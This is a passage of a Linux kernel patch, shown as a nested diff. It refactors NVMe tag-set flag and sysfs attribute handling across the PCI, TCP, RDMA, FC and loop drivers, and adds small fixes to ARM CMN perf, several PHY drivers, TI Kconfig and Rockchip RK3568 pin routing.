+ static const struct attribute_group *nvme_dev_attr_groups[] = {
+ 	&nvme_dev_attrs_group,
+@@ -4839,8 +4840,7 @@ void nvme_complete_async_event(struct nvme_ctrl *ctrl, __le16 status,
+ EXPORT_SYMBOL_GPL(nvme_complete_async_event);
+ 
+ int nvme_alloc_admin_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+-		const struct blk_mq_ops *ops, unsigned int flags,
+-		unsigned int cmd_size)
++		const struct blk_mq_ops *ops, unsigned int cmd_size)
+ {
+ 	int ret;
+ 
+@@ -4850,7 +4850,9 @@ int nvme_alloc_admin_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ 	if (ctrl->ops->flags & NVME_F_FABRICS)
+ 		set->reserved_tags = NVMF_RESERVED_TAGS;
+ 	set->numa_node = ctrl->numa_node;
+-	set->flags = flags;
++	set->flags = BLK_MQ_F_NO_SCHED;
++	if (ctrl->ops->flags & NVME_F_BLOCKING)
++		set->flags |= BLK_MQ_F_BLOCKING;
+ 	set->cmd_size = cmd_size;
+ 	set->driver_data = ctrl;
+ 	set->nr_hw_queues = 1;
+@@ -4894,8 +4896,8 @@ void nvme_remove_admin_tag_set(struct nvme_ctrl *ctrl)
+ EXPORT_SYMBOL_GPL(nvme_remove_admin_tag_set);
+ 
+ int nvme_alloc_io_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+-		const struct blk_mq_ops *ops, unsigned int flags,
+-		unsigned int nr_maps, unsigned int cmd_size)
++		const struct blk_mq_ops *ops, unsigned int nr_maps,
++		unsigned int cmd_size)
+ {
+ 	int ret;
+ 
+@@ -4904,7 +4906,9 @@ int nvme_alloc_io_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ 	set->queue_depth = ctrl->sqsize + 1;
+ 	set->reserved_tags = NVMF_RESERVED_TAGS;
+ 	set->numa_node = ctrl->numa_node;
+-	set->flags = flags;
++	set->flags = BLK_MQ_F_SHOULD_MERGE;
++	if (ctrl->ops->flags & NVME_F_BLOCKING)
++		set->flags |= BLK_MQ_F_BLOCKING;
+ 	set->cmd_size = cmd_size,
+ 	set->driver_data = ctrl;
+ 	set->nr_hw_queues = ctrl->queue_count - 1;
+@@ -5080,7 +5084,10 @@ int nvme_init_ctrl(struct nvme_ctrl *ctrl, struct device *dev,
+ 			ctrl->instance);
+ 	ctrl->device->class = nvme_class;
+ 	ctrl->device->parent = ctrl->dev;
+-	ctrl->device->groups = nvme_dev_attr_groups;
++	if (ops->dev_attr_groups)
++		ctrl->device->groups = ops->dev_attr_groups;
++	else
++		ctrl->device->groups = nvme_dev_attr_groups;
+ 	ctrl->device->release = nvme_free_ctrl;
+ 	dev_set_drvdata(ctrl->device, ctrl);
+ 	ret = dev_set_name(ctrl->device, "nvme%d", ctrl->instance);
+diff --git a/drivers/nvme/host/fc.c b/drivers/nvme/host/fc.c
+index 20b0c29a9a341..6c3d469eed7e3 100644
+--- a/drivers/nvme/host/fc.c
++++ b/drivers/nvme/host/fc.c
+@@ -2903,7 +2903,7 @@ nvme_fc_create_io_queues(struct nvme_fc_ctrl *ctrl)
+ 	nvme_fc_init_io_queues(ctrl);
+ 
+ 	ret = nvme_alloc_io_tag_set(&ctrl->ctrl, &ctrl->tag_set,
+-			&nvme_fc_mq_ops, BLK_MQ_F_SHOULD_MERGE, 1,
++			&nvme_fc_mq_ops, 1,
+ 			struct_size((struct nvme_fcp_op_w_sgl *)NULL, priv,
+ 				    ctrl->lport->ops->fcprqst_priv_sz));
+ 	if (ret)
+@@ -3508,13 +3508,6 @@ nvme_fc_init_ctrl(struct device *dev, struct nvmf_ctrl_options *opts,
+ 
+ 	nvme_fc_init_queue(ctrl, 0);
+ 
+-	ret = nvme_alloc_admin_tag_set(&ctrl->ctrl, &ctrl->admin_tag_set,
+-			&nvme_fc_admin_mq_ops, BLK_MQ_F_NO_SCHED,
+-			struct_size((struct nvme_fcp_op_w_sgl *)NULL, priv,
+-				    ctrl->lport->ops->fcprqst_priv_sz));
+-	if (ret)
+-		goto out_free_queues;
+-
+ 	/*
+ 	 * Would have been nice to init io queues tag set as well.
+ 	 * However, we require interaction from the controller
+@@ -3524,10 +3517,17 @@ nvme_fc_init_ctrl(struct device *dev, struct nvmf_ctrl_options *opts,
+ 
+ 	ret = nvme_init_ctrl(&ctrl->ctrl, dev, &nvme_fc_ctrl_ops, 0);
+ 	if (ret)
+-		goto out_cleanup_tagset;
++		goto out_free_queues;
+ 
+ 	/* at this point, teardown path changes to ref counting on nvme ctrl */
+ 
++	ret = nvme_alloc_admin_tag_set(&ctrl->ctrl, &ctrl->admin_tag_set,
++			&nvme_fc_admin_mq_ops,
++			struct_size((struct nvme_fcp_op_w_sgl *)NULL, priv,
++				    ctrl->lport->ops->fcprqst_priv_sz));
++	if (ret)
++		goto fail_ctrl;
++
+ 	spin_lock_irqsave(&rport->lock, flags);
+ 	list_add_tail(&ctrl->ctrl_list, &rport->ctrl_list);
+ 	spin_unlock_irqrestore(&rport->lock, flags);
+@@ -3579,8 +3579,6 @@ fail_ctrl:
+ 
+ 	return ERR_PTR(-EIO);
+ 
+-out_cleanup_tagset:
+-	nvme_remove_admin_tag_set(&ctrl->ctrl);
+ out_free_queues:
+ 	kfree(ctrl->queues);
+ out_free_ida:
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index cbda8a19409bf..01d90424af534 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
+@@ -508,6 +508,9 @@ struct nvme_ctrl_ops {
+ 	unsigned int flags;
+ #define NVME_F_FABRICS			(1 << 0)
+ #define NVME_F_METADATA_SUPPORTED	(1 << 1)
++#define NVME_F_BLOCKING			(1 << 2)
++
++	const struct attribute_group **dev_attr_groups;
+ 	int (*reg_read32)(struct nvme_ctrl *ctrl, u32 off, u32 *val);
+ 	int (*reg_write32)(struct nvme_ctrl *ctrl, u32 off, u32 val);
+ 	int (*reg_read64)(struct nvme_ctrl *ctrl, u32 off, u64 *val);
+@@ -738,12 +741,11 @@ void nvme_start_ctrl(struct nvme_ctrl *ctrl);
+ void nvme_stop_ctrl(struct nvme_ctrl *ctrl);
+ int nvme_init_ctrl_finish(struct nvme_ctrl *ctrl);
+ int nvme_alloc_admin_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+-		const struct blk_mq_ops *ops, unsigned int flags,
+-		unsigned int cmd_size);
++		const struct blk_mq_ops *ops, unsigned int cmd_size);
+ void nvme_remove_admin_tag_set(struct nvme_ctrl *ctrl);
+ int nvme_alloc_io_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+-		const struct blk_mq_ops *ops, unsigned int flags,
+-		unsigned int nr_maps, unsigned int cmd_size);
++		const struct blk_mq_ops *ops, unsigned int nr_maps,
++		unsigned int cmd_size);
+ void nvme_remove_io_tag_set(struct nvme_ctrl *ctrl);
+ 
+ void nvme_remove_namespaces(struct nvme_ctrl *ctrl);
+@@ -857,6 +859,7 @@ int nvme_dev_uring_cmd(struct io_uring_cmd *ioucmd, unsigned int issue_flags);
+ extern const struct attribute_group *nvme_ns_id_attr_groups[];
+ extern const struct pr_ops nvme_pr_ops;
+ extern const struct block_device_operations nvme_ns_head_ops;
++extern const struct attribute_group nvme_dev_attrs_group;
+ 
+ struct nvme_ns *nvme_find_path(struct nvme_ns_head *head);
+ #ifdef CONFIG_NVME_MULTIPATH
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 115d81def5671..d839689af17ce 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -158,8 +158,6 @@ struct nvme_dev {
+ 	unsigned int nr_allocated_queues;
+ 	unsigned int nr_write_queues;
+ 	unsigned int nr_poll_queues;
+-
+-	bool attrs_added;
+ };
+ 
+ static int io_queue_depth_set(const char *val, const struct kernel_param *kp)
+@@ -1367,7 +1365,7 @@ static enum blk_eh_timer_return nvme_timeout(struct request *req)
+ 	else
+ 		nvme_poll_irqdisable(nvmeq);
+ 
+-	if (blk_mq_request_completed(req)) {
++	if (blk_mq_rq_state(req) != MQ_RQ_IN_FLIGHT) {
+ 		dev_warn(dev->ctrl.device,
+ 			 "I/O %d QID %d timeout, completion polled\n",
+ 			 req->tag, nvmeq->qid);
+@@ -2241,11 +2239,17 @@ static struct attribute *nvme_pci_attrs[] = {
+ 	NULL,
+ };
+ 
+-static const struct attribute_group nvme_pci_attr_group = {
++static const struct attribute_group nvme_pci_dev_attrs_group = {
+ 	.attrs		= nvme_pci_attrs,
+ 	.is_visible	= nvme_pci_attrs_are_visible,
+ };
+ 
++static const struct attribute_group *nvme_pci_dev_attr_groups[] = {
++	&nvme_dev_attrs_group,
++	&nvme_pci_dev_attrs_group,
++	NULL,
++};
++
+ /*
+  * nirqs is the number of interrupts available for write and read
+  * queues. The core already reserved an interrupt for the admin queue.
+@@ -2935,10 +2939,6 @@ static void nvme_reset_work(struct work_struct *work)
+ 		goto out;
+ 	}
+ 
+-	if (!dev->attrs_added && !sysfs_create_group(&dev->ctrl.device->kobj,
+-			&nvme_pci_attr_group))
+-		dev->attrs_added = true;
+-
+ 	nvme_start_ctrl(&dev->ctrl);
+ 	return;
+ 
+@@ -3011,6 +3011,7 @@ static const struct nvme_ctrl_ops nvme_pci_ctrl_ops = {
+ 	.name			= "pcie",
+ 	.module			= THIS_MODULE,
+ 	.flags			= NVME_F_METADATA_SUPPORTED,
++	.dev_attr_groups	= nvme_pci_dev_attr_groups,
+ 	.reg_read32		= nvme_pci_reg_read32,
+ 	.reg_write32		= nvme_pci_reg_write32,
+ 	.reg_read64		= nvme_pci_reg_read64,
+@@ -3209,13 +3210,6 @@ static void nvme_shutdown(struct pci_dev *pdev)
+ 	nvme_disable_prepare_reset(dev, true);
+ }
+ 
+-static void nvme_remove_attrs(struct nvme_dev *dev)
+-{
+-	if (dev->attrs_added)
+-		sysfs_remove_group(&dev->ctrl.device->kobj,
+-				   &nvme_pci_attr_group);
+-}
+-
+ /*
+  * The driver's remove may be called on a device in a partially initialized
+  * state. This function must not have any dependencies on the device state in
+@@ -3237,7 +3231,6 @@ static void nvme_remove(struct pci_dev *pdev)
+ 	nvme_stop_ctrl(&dev->ctrl);
+ 	nvme_remove_namespaces(&dev->ctrl);
+ 	nvme_dev_disable(dev, true);
+-	nvme_remove_attrs(dev);
+ 	nvme_free_host_mem(dev);
+ 	nvme_dev_remove_admin(dev);
+ 	nvme_free_queues(dev, 0);
+diff --git a/drivers/nvme/host/rdma.c b/drivers/nvme/host/rdma.c
+index a55d3e8b607d5..6f918e61b6aef 100644
+--- a/drivers/nvme/host/rdma.c
++++ b/drivers/nvme/host/rdma.c
+@@ -798,7 +798,7 @@ static int nvme_rdma_alloc_tag_set(struct nvme_ctrl *ctrl)
+ 			    NVME_RDMA_METADATA_SGL_SIZE;
+ 
+ 	return nvme_alloc_io_tag_set(ctrl, &to_rdma_ctrl(ctrl)->tag_set,
+-			&nvme_rdma_mq_ops, BLK_MQ_F_SHOULD_MERGE,
++			&nvme_rdma_mq_ops,
+ 			ctrl->opts->nr_poll_queues ? HCTX_MAX_TYPES : 2,
+ 			cmd_size);
+ }
+@@ -848,7 +848,6 @@ static int nvme_rdma_configure_admin_queue(struct nvme_rdma_ctrl *ctrl,
+ 	if (new) {
+ 		error = nvme_alloc_admin_tag_set(&ctrl->ctrl,
+ 				&ctrl->admin_tag_set, &nvme_rdma_admin_mq_ops,
+-				BLK_MQ_F_NO_SCHED,
+ 				sizeof(struct nvme_rdma_request) +
+ 				NVME_RDMA_DATA_SGL_SIZE);
+ 		if (error)
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index 83735c52d34a0..eacd445b5333f 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -1867,7 +1867,6 @@ static int nvme_tcp_configure_io_queues(struct nvme_ctrl *ctrl, bool new)
+ 	if (new) {
+ 		ret = nvme_alloc_io_tag_set(ctrl, &to_tcp_ctrl(ctrl)->tag_set,
+ 				&nvme_tcp_mq_ops,
+-				BLK_MQ_F_SHOULD_MERGE | BLK_MQ_F_BLOCKING,
+ 				ctrl->opts->nr_poll_queues ? HCTX_MAX_TYPES : 2,
+ 				sizeof(struct nvme_tcp_request));
+ 		if (ret)
+@@ -1943,7 +1942,7 @@ static int nvme_tcp_configure_admin_queue(struct nvme_ctrl *ctrl, bool new)
+ 	if (new) {
+ 		error = nvme_alloc_admin_tag_set(ctrl,
+ 				&to_tcp_ctrl(ctrl)->admin_tag_set,
+-				&nvme_tcp_admin_mq_ops, BLK_MQ_F_BLOCKING,
++				&nvme_tcp_admin_mq_ops,
+ 				sizeof(struct nvme_tcp_request));
+ 		if (error)
+ 			goto out_free_queue;
+@@ -2524,7 +2523,7 @@ static const struct blk_mq_ops nvme_tcp_admin_mq_ops = {
+ static const struct nvme_ctrl_ops nvme_tcp_ctrl_ops = {
+ 	.name			= "tcp",
+ 	.module			= THIS_MODULE,
+-	.flags			= NVME_F_FABRICS,
++	.flags			= NVME_F_FABRICS | NVME_F_BLOCKING,
+ 	.reg_read32		= nvmf_reg_read32,
+ 	.reg_read64		= nvmf_reg_read64,
+ 	.reg_write32		= nvmf_reg_write32,
+diff --git a/drivers/nvme/target/loop.c b/drivers/nvme/target/loop.c
+index 08c583258e90f..c864e902e91e2 100644
+--- a/drivers/nvme/target/loop.c
++++ b/drivers/nvme/target/loop.c
+@@ -353,7 +353,7 @@ static int nvme_loop_configure_admin_queue(struct nvme_loop_ctrl *ctrl)
+ 	ctrl->ctrl.queue_count = 1;
+ 
+ 	error = nvme_alloc_admin_tag_set(&ctrl->ctrl, &ctrl->admin_tag_set,
+-			&nvme_loop_admin_mq_ops, BLK_MQ_F_NO_SCHED,
++			&nvme_loop_admin_mq_ops,
+ 			sizeof(struct nvme_loop_iod) +
+ 			NVME_INLINE_SG_CNT * sizeof(struct scatterlist));
+ 	if (error)
+@@ -494,7 +494,7 @@ static int nvme_loop_create_io_queues(struct nvme_loop_ctrl *ctrl)
+ 		return ret;
+ 
+ 	ret = nvme_alloc_io_tag_set(&ctrl->ctrl, &ctrl->tag_set,
+-			&nvme_loop_mq_ops, BLK_MQ_F_SHOULD_MERGE, 1,
++			&nvme_loop_mq_ops, 1,
+ 			sizeof(struct nvme_loop_iod) +
+ 			NVME_INLINE_SG_CNT * sizeof(struct scatterlist));
+ 	if (ret)
+diff --git a/drivers/perf/arm-cmn.c b/drivers/perf/arm-cmn.c
+index b80a9b74662b1..1deb61b22bc76 100644
+--- a/drivers/perf/arm-cmn.c
++++ b/drivers/perf/arm-cmn.c
+@@ -1576,7 +1576,6 @@ static int arm_cmn_event_init(struct perf_event *event)
+ 			hw->dn++;
+ 			continue;
+ 		}
+-		hw->dtcs_used |= arm_cmn_node_to_xp(cmn, dn)->dtc;
+ 		hw->num_dns++;
+ 		if (bynodeid)
+ 			break;
+@@ -1589,6 +1588,12 @@ static int arm_cmn_event_init(struct perf_event *event)
+ 			nodeid, nid.x, nid.y, nid.port, nid.dev, type);
+ 		return -EINVAL;
+ 	}
++	/*
++	 * Keep assuming non-cycles events count in all DTC domains; turns out
++	 * it's hard to make a worthwhile optimisation around this, short of
++	 * going all-in with domain-local counter allocation as well.
++	 */
++	hw->dtcs_used = (1U << cmn->num_dtcs) - 1;
+ 
+ 	return arm_cmn_validate_group(cmn, event);
+ }
+diff --git a/drivers/phy/phy-can-transceiver.c b/drivers/phy/phy-can-transceiver.c
+index 95c6dbb52da72..ce511ad5d3690 100644
+--- a/drivers/phy/phy-can-transceiver.c
++++ b/drivers/phy/phy-can-transceiver.c
+@@ -99,6 +99,7 @@ static int can_transceiver_phy_probe(struct platform_device *pdev)
+ 	struct gpio_desc *standby_gpio;
+ 	struct gpio_desc *enable_gpio;
+ 	u32 max_bitrate = 0;
++	int err;
+ 
+ 	can_transceiver_phy = devm_kzalloc(dev, sizeof(struct can_transceiver_phy), GFP_KERNEL);
+ 	if (!can_transceiver_phy)
+@@ -124,8 +125,8 @@ static int can_transceiver_phy_probe(struct platform_device *pdev)
+ 		return PTR_ERR(phy);
+ 	}
+ 
+-	device_property_read_u32(dev, "max-bitrate", &max_bitrate);
+-	if (!max_bitrate)
++	err = device_property_read_u32(dev, "max-bitrate", &max_bitrate);
++	if ((err != -EINVAL) && !max_bitrate)
+ 		dev_warn(dev, "Invalid value for transceiver max bitrate. Ignoring bitrate limit\n");
+ 	phy->attrs.max_link_rate = max_bitrate;
+ 
+diff --git a/drivers/phy/rockchip/phy-rockchip-inno-usb2.c b/drivers/phy/rockchip/phy-rockchip-inno-usb2.c
+index e6ededc515239..a0bc10aa79618 100644
+--- a/drivers/phy/rockchip/phy-rockchip-inno-usb2.c
++++ b/drivers/phy/rockchip/phy-rockchip-inno-usb2.c
+@@ -485,8 +485,10 @@ static int rockchip_usb2phy_power_on(struct phy *phy)
+ 		return ret;
+ 
+ 	ret = property_enable(base, &rport->port_cfg->phy_sus, false);
+-	if (ret)
++	if (ret) {
++		clk_disable_unprepare(rphy->clk480m);
+ 		return ret;
++	}
+ 
+ 	/* waiting for the utmi_clk to become stable */
+ 	usleep_range(1500, 2000);
+diff --git a/drivers/phy/sunplus/phy-sunplus-usb2.c b/drivers/phy/sunplus/phy-sunplus-usb2.c
+index e827b79f6d493..56de41091d639 100644
+--- a/drivers/phy/sunplus/phy-sunplus-usb2.c
++++ b/drivers/phy/sunplus/phy-sunplus-usb2.c
+@@ -254,6 +254,9 @@ static int sp_usb_phy_probe(struct platform_device *pdev)
+ 		return PTR_ERR(usbphy->phy_regs);
+ 
+ 	usbphy->moon4_res_mem = platform_get_resource_byname(pdev, IORESOURCE_MEM, "moon4");
++	if (!usbphy->moon4_res_mem)
++		return -EINVAL;
++
+ 	usbphy->moon4_regs = devm_ioremap(&pdev->dev, usbphy->moon4_res_mem->start,
+ 					  resource_size(usbphy->moon4_res_mem));
+ 	if (!usbphy->moon4_regs)
+diff --git a/drivers/phy/ti/Kconfig b/drivers/phy/ti/Kconfig
+index 15a3bcf323086..b905902d57508 100644
+--- a/drivers/phy/ti/Kconfig
++++ b/drivers/phy/ti/Kconfig
+@@ -23,7 +23,7 @@ config PHY_DM816X_USB
+ 
+ config PHY_AM654_SERDES
+ 	tristate "TI AM654 SERDES support"
+-	depends on OF && ARCH_K3 || COMPILE_TEST
++	depends on OF && (ARCH_K3 || COMPILE_TEST)
+ 	depends on COMMON_CLK
+ 	select GENERIC_PHY
+ 	select MULTIPLEXER
+@@ -35,7 +35,7 @@ config PHY_AM654_SERDES
+ 
+ config PHY_J721E_WIZ
+ 	tristate "TI J721E WIZ (SERDES Wrapper) support"
+-	depends on OF && ARCH_K3 || COMPILE_TEST
++	depends on OF && (ARCH_K3 || COMPILE_TEST)
+ 	depends on HAS_IOMEM && OF_ADDRESS
+ 	depends on COMMON_CLK
+ 	select GENERIC_PHY
+diff --git a/drivers/pinctrl/pinctrl-rockchip.c b/drivers/pinctrl/pinctrl-rockchip.c
+index da974ff2d75d0..5eeac92f610a0 100644
+--- a/drivers/pinctrl/pinctrl-rockchip.c
++++ b/drivers/pinctrl/pinctrl-rockchip.c
+@@ -926,19 +926,19 @@ static struct rockchip_mux_route_data rk3568_mux_route_data[] = {
+ 	RK_MUXROUTE_PMU(0, RK_PB5, 4, 0x0110, WRITE_MASK_VAL(3, 2, 1)), /* PWM1 IO mux M1 */
+ 	RK_MUXROUTE_PMU(0, RK_PC1, 1, 0x0110, WRITE_MASK_VAL(5, 4, 0)), /* PWM2 IO mux M0 */
+ 	RK_MUXROUTE_PMU(0, RK_PB6, 4, 0x0110, WRITE_MASK_VAL(5, 4, 1)), /* PWM2 IO mux M1 */
+-	RK_MUXROUTE_PMU(0, RK_PB3, 2, 0x0300, WRITE_MASK_VAL(0, 0, 0)), /* CAN0 IO mux M0 */
++	RK_MUXROUTE_GRF(0, RK_PB3, 2, 0x0300, WRITE_MASK_VAL(0, 0, 0)), /* CAN0 IO mux M0 */
+ 	RK_MUXROUTE_GRF(2, RK_PA1, 4, 0x0300, WRITE_MASK_VAL(0, 0, 1)), /* CAN0 IO mux M1 */
+ 	RK_MUXROUTE_GRF(1, RK_PA1, 3, 0x0300, WRITE_MASK_VAL(2, 2, 0)), /* CAN1 IO mux M0 */
+ 	RK_MUXROUTE_GRF(4, RK_PC3, 3, 0x0300, WRITE_MASK_VAL(2, 2, 1)), /* CAN1 IO mux M1 */
+ 	RK_MUXROUTE_GRF(4, RK_PB5, 3, 0x0300, WRITE_MASK_VAL(4, 4, 0)), /* CAN2 IO mux M0 */
+ 	RK_MUXROUTE_GRF(2, RK_PB2, 4, 0x0300, WRITE_MASK_VAL(4, 4, 1)), /* CAN2 IO mux M1 */
+ 	RK_MUXROUTE_GRF(4, RK_PC4, 1, 0x0300, WRITE_MASK_VAL(6, 6, 0)), /* HPDIN IO mux M0 */
+-	RK_MUXROUTE_PMU(0, RK_PC2, 2, 0x0300, WRITE_MASK_VAL(6, 6, 1)), /* HPDIN IO mux M1 */
++	RK_MUXROUTE_GRF(0, RK_PC2, 2, 0x0300, WRITE_MASK_VAL(6, 6, 1)), /* HPDIN IO mux M1 */
+ 	RK_MUXROUTE_GRF(3, RK_PB1, 3, 0x0300, WRITE_MASK_VAL(8, 8, 0)), /* GMAC1 IO mux M0 */
+ 	RK_MUXROUTE_GRF(4, RK_PA7, 3, 0x0300, WRITE_MASK_VAL(8, 8, 1)), /* GMAC1 IO mux M1 */
+ 	RK_MUXROUTE_GRF(4, RK_PD1, 1, 0x0300, WRITE_MASK_VAL(10, 10, 0)), /* HDMITX IO mux M0 */
+-	RK_MUXROUTE_PMU(0, RK_PC7, 1, 0x0300, WRITE_MASK_VAL(10, 10, 1)), /* HDMITX IO mux M1 */
+-	RK_MUXROUTE_PMU(0, RK_PB6, 1, 0x0300, WRITE_MASK_VAL(14, 14, 0)), /* I2C2 IO mux M0 */
++	RK_MUXROUTE_GRF(0, RK_PC7, 1, 0x0300, WRITE_MASK_VAL(10, 10, 1)), /* HDMITX IO mux M1 */
++	RK_MUXROUTE_GRF(0, RK_PB6, 1, 0x0300, WRITE_MASK_VAL(14, 14, 0)), /* I2C2 IO mux M0 */
+ 	RK_MUXROUTE_GRF(4, RK_PB4, 1, 0x0300, WRITE_MASK_VAL(14, 14, 1)), /* I2C2 IO mux M1 */
+ 	RK_MUXROUTE_GRF(1, RK_PA0, 1, 0x0304, WRITE_MASK_VAL(0, 0, 0)), /* I2C3 IO mux M0 */
+ 	RK_MUXROUTE_GRF(3, RK_PB6, 4, 0x0304, WRITE_MASK_VAL(0, 0, 1)), /* I2C3 IO mux M1 */
+@@ -964,7 +964,7 @@ static struct rockchip_mux_route_data rk3568_mux_route_data[] = {
+ 	RK_MUXROUTE_GRF(4, RK_PC3, 1, 0x0308, WRITE_MASK_VAL(12, 12, 1)), /* PWM15 IO mux M1 */
+ 	RK_MUXROUTE_GRF(3, RK_PD2, 3, 0x0308, WRITE_MASK_VAL(14, 14, 0)), /* SDMMC2 IO mux M0 */
+ 	RK_MUXROUTE_GRF(3, RK_PA5, 5, 0x0308, WRITE_MASK_VAL(14, 14, 1)), /* SDMMC2 IO mux M1 */
+-	RK_MUXROUTE_PMU(0, RK_PB5, 2, 0x030c, WRITE_MASK_VAL(0, 0, 0)), /* SPI0 IO mux M0 */
++	RK_MUXROUTE_GRF(0, RK_PB5, 2, 0x030c, WRITE_MASK_VAL(0, 0, 0)), /* SPI0 IO mux M0 */
+ 	RK_MUXROUTE_GRF(2, RK_PD3, 3, 0x030c, WRITE_MASK_VAL(0, 0, 1)), /* SPI0 IO mux M1 */
+ 	RK_MUXROUTE_GRF(2, RK_PB5, 3, 0x030c, WRITE_MASK_VAL(2, 2, 0)), /* SPI1 IO mux M0 */
+ 	RK_MUXROUTE_GRF(3, RK_PC3, 3, 0x030c, WRITE_MASK_VAL(2, 2, 1)), /* SPI1 IO mux M1 */
+@@ -973,8 +973,8 @@ static struct rockchip_mux_route_data rk3568_mux_route_data[] = {
+ 	RK_MUXROUTE_GRF(4, RK_PB3, 4, 0x030c, WRITE_MASK_VAL(6, 6, 0)), /* SPI3 IO mux M0 */
+ 	RK_MUXROUTE_GRF(4, RK_PC2, 2, 0x030c, WRITE_MASK_VAL(6, 6, 1)), /* SPI3 IO mux M1 */
+ 	RK_MUXROUTE_GRF(2, RK_PB4, 2, 0x030c, WRITE_MASK_VAL(8, 8, 0)), /* UART1 IO mux M0 */
+-	RK_MUXROUTE_PMU(0, RK_PD1, 1, 0x030c, WRITE_MASK_VAL(8, 8, 1)), /* UART1 IO mux M1 */
+-	RK_MUXROUTE_PMU(0, RK_PD1, 1, 0x030c, WRITE_MASK_VAL(10, 10, 0)), /* UART2 IO mux M0 */
++	RK_MUXROUTE_GRF(3, RK_PD6, 4, 0x030c, WRITE_MASK_VAL(8, 8, 1)), /* UART1 IO mux M1 */
++	RK_MUXROUTE_GRF(0, RK_PD1, 1, 0x030c, WRITE_MASK_VAL(10, 10, 0)), /* UART2 IO mux M0 */
+ 	RK_MUXROUTE_GRF(1, RK_PD5, 2, 0x030c, WRITE_MASK_VAL(10, 10, 1)), /* UART2 IO mux M1 */
+ 	RK_MUXROUTE_GRF(1, RK_PA1, 2, 0x030c, WRITE_MASK_VAL(12, 12, 0)), /* UART3 IO mux M0 */
+ 	RK_MUXROUTE_GRF(3, RK_PB7, 4, 0x030c, WRITE_MASK_VAL(12, 12, 1)), /* UART3 IO mux M1 */
+@@ -1004,13 +1004,13 @@ static struct rockchip_mux_route_data rk3568_mux_route_data[] = {
+ 	RK_MUXROUTE_GRF(3, RK_PD6, 5, 0x0314, WRITE_MASK_VAL(1, 0, 1)), /* PDM IO mux M1 */
+ 	RK_MUXROUTE_GRF(4, RK_PA0, 4, 0x0314, WRITE_MASK_VAL(1, 0, 1)), /* PDM IO mux M1 */
+ 	RK_MUXROUTE_GRF(3, RK_PC4, 5, 0x0314, WRITE_MASK_VAL(1, 0, 2)), /* PDM IO mux M2 */
+-	RK_MUXROUTE_PMU(0, RK_PA5, 3, 0x0314, WRITE_MASK_VAL(3, 2, 0)), /* PCIE20 IO mux M0 */
++	RK_MUXROUTE_GRF(0, RK_PA5, 3, 0x0314, WRITE_MASK_VAL(3, 2, 0)), /* PCIE20 IO mux M0 */
+ 	RK_MUXROUTE_GRF(2, RK_PD0, 4, 0x0314, WRITE_MASK_VAL(3, 2, 1)), /* PCIE20 IO mux M1 */
+ 	RK_MUXROUTE_GRF(1, RK_PB0, 4, 0x0314, WRITE_MASK_VAL(3, 2, 2)), /* PCIE20 IO mux M2 */
+-	RK_MUXROUTE_PMU(0, RK_PA4, 3, 0x0314, WRITE_MASK_VAL(5, 4, 0)), /* PCIE30X1 IO mux M0 */
++	RK_MUXROUTE_GRF(0, RK_PA4, 3, 0x0314, WRITE_MASK_VAL(5, 4, 0)), /* PCIE30X1 IO mux M0 */
+ 	RK_MUXROUTE_GRF(2, RK_PD2, 4, 0x0314, WRITE_MASK_VAL(5, 4, 1)), /* PCIE30X1 IO mux M1 */
+ 	RK_MUXROUTE_GRF(1, RK_PA5, 4, 0x0314, WRITE_MASK_VAL(5, 4, 2)), /* PCIE30X1 IO mux M2 */
+-	RK_MUXROUTE_PMU(0, RK_PA6, 2, 0x0314, WRITE_MASK_VAL(7, 6, 0)), /* PCIE30X2 IO mux M0 */
++	RK_MUXROUTE_GRF(0, RK_PA6, 2, 0x0314, WRITE_MASK_VAL(7, 6, 0)), /* PCIE30X2 IO mux M0 */
+ 	RK_MUXROUTE_GRF(2, RK_PD4, 4, 0x0314, WRITE_MASK_VAL(7, 6, 1)), /* PCIE30X2 IO mux M1 */
+ 	RK_MUXROUTE_GRF(4, RK_PC2, 4, 0x0314, WRITE_MASK_VAL(7, 6, 2)), /* PCIE30X2 IO mux M2 */
+ };
+@@ -2436,10 +2436,19 @@ static int rockchip_get_pull(struct rockchip_pin_bank *bank, int pin_num)
+ 	case RK3308:
+ 	case RK3368:
+ 	case RK3399:
++	case RK3568:
+ 	case RK3588:
+ 		pull_type = bank->pull_type[pin_num / 8];
+ 		data >>= bit;
+ 		data &= (1 << RK3188_PULL_BITS_PER_PIN) - 1;
++		/*
++		 * In the TRM, pull-up being 1 for everything except the GPIO0_D3-D6,
++		 * where that pull up value becomes 3.
++		 */
++		if (ctrl->type == RK3568 && bank->bank_num == 0 && pin_num >= 27 && pin_num <= 30) {
++			if (data == 3)
++				data = 1;
++		}
+ 
+ 		return rockchip_pull_list[pull_type][data];
+ 	default:
+@@ -2497,7 +2506,7 @@ static int rockchip_set_pull(struct rockchip_pin_bank *bank,
+ 			}
+ 		}
+ 		/*
+-		 * In the TRM, pull-up being 1 for everything except the GPIO0_D0-D6,
++		 * In the TRM, pull-up being 1 for everything except the GPIO0_D3-D6,
+ 		 * where that pull up value becomes 3.
+ 		 */
+ 		if (ctrl->type == RK3568 && bank->bank_num == 0 && pin_num >= 27 && pin_num <= 30) {
+diff --git a/drivers/platform/x86/apple-gmux.c b/drivers/platform/x86/apple-gmux.c
+index ca33df7ea550e..9333f82cfa8a0 100644
+--- a/drivers/platform/x86/apple-gmux.c
++++ b/drivers/platform/x86/apple-gmux.c
+@@ -64,29 +64,6 @@ struct apple_gmux_data {
+ 
+ static struct apple_gmux_data *apple_gmux_data;
+ 
+-/*
+- * gmux port offsets. Many of these are not yet used, but may be in the
+- * future, and it's useful to have them documented here anyhow.
+- */
+-#define GMUX_PORT_VERSION_MAJOR		0x04
+-#define GMUX_PORT_VERSION_MINOR		0x05
